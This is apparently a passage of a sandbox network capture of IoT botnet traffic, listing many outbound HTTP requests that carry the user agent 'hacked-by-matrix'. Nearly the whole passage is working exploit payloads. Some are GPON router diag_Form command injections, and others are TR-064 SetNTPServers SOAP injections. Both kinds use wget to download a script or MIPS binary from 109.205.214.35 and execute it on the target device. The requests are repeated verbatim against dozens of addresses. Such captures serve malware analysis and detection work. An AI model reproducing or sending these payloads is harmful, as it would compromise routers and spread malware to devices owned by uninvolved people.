                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1081192.168.2.135711842.11.141.203443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.700829029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1082192.168.2.1348802109.61.193.212443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.700850964 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1083192.168.2.133805242.223.49.133443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.700872898 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1084192.168.2.1341974109.112.219.173443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.700874090 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1085192.168.2.1343490118.122.24.206443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.700894117 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1086192.168.2.1343256109.57.21.183443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.700978041 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1087192.168.2.1351374118.168.161.243443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.700982094 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1088192.168.2.1333908212.152.210.87443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.701000929 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1089192.168.2.13455065.255.154.226443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.701006889 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1090192.168.2.13582905.69.66.140443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.701036930 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1091192.168.2.1340712212.191.18.247443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.701037884 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1092192.168.2.136045042.35.100.237443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.701044083 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1093192.168.2.13581625.137.9.230443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.701064110 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1094192.168.2.1333932118.158.199.160443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.701086998 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1095192.168.2.1350682109.60.244.174443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.701097012 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1096192.168.2.13461145.125.56.201443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.701143980 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1097192.168.2.1349720212.103.25.31443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.701143980 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1098192.168.2.1358104118.65.193.32443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.701149940 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1099192.168.2.13374045.205.72.198443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.701174974 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1100192.168.2.135402247.149.12.2317547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.863440037 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1101192.168.2.134425238.181.191.157547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:15.003684998 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:19.212263107 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:25.356246948 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:37.390225887 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
